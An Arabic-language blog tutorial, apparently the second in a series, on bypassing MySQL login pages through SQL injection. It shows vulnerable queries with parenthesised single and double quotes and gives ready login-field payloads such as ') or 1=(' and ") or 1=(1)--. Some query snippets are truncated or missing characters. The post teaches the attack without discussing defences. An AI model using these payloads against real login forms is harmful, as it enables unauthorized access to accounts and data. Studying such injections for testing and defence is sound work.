4chieve THE T4RG3T /Bypass login page~2





تكمله للموضوع السابق في تخطى لوحة التحكم في استعلامات الماي سيكول. ندخل في الموضوع بدون مقدمات.


لنفرض باننا واجهنا سكربت يستعلم من خلال القاعده هاكذا

كود PHP:
SELECT FROM users WHERE name=('nu11') and password=('nu11'LIMIT 0,


في حالات التخطى يلزم بتنفيذ الاستعلام متوازي لكي يقوم بالتحقق بانها صحيحه في الماي سيكول

اي انه التخطي يكون هاكذا بحيث انه متوازي

كود PHP:
SELECT FROM users WHERE name=('') OR 1=('1') AND password=('') OR 1=('1')LIMIT 0,
الان نتجه الى الماي سيكول لنرا هل الاستعلام متاوزي ام لا
والنتيجه. نعم



تم التخطي والاستعراض ولكن لم نأتي بالتخطي من خلال الوحه تكون هاكذا

كود PHP:
') or 1=('
or

كود PHP:
') or 1=(1)-- 


الان نتجه الى طريقه اخرى في الاستعلام بحيث انه الاستعلام يتم من خلال علامة التنصيص "

تخطى علامه التنصيص نفس تقريبا الي قبلها خلونا ناخذ مثال

الاستعلام من القاعدة
كود PHP:
SELECT FROM users WHERE name=("nu11") and password=("nu11"


لنوازي الاستعلام الذي من خلاله راح نتخطى الوحه
كود PHP:
SELECT FROM users WHERE name=("") OR 1=("1") AND password=("") OR 1=("1"
طيب الان خلونا نستعلم من خلال القاعده ونرا ان كان فعلا تخطى او لا

والنتيجه



ممتاز تم التخطي، الان لنطلب الاستعلام من خلال الوحة ونرى راح يكون الاستغلال نفس الي قبل ولكن مع مراعاه علامة التنصيص ""

هاكذا
كود PHP:
") or 1=(1)-- 
or
كود PHP:
") or 1=("
والنتيجه استعلام موزون وحقيقي



في النهايه اتمنى انه يكون شرحي في فايده، لكم كل الود والتقدير ألقاكم في شرح اخر بأذن الله

تعليقات

المشاركات الشائعة من هذه المدونة

CRLF injection [\r\n Carriage Return]

Study in Nosql-Injection-Mongodb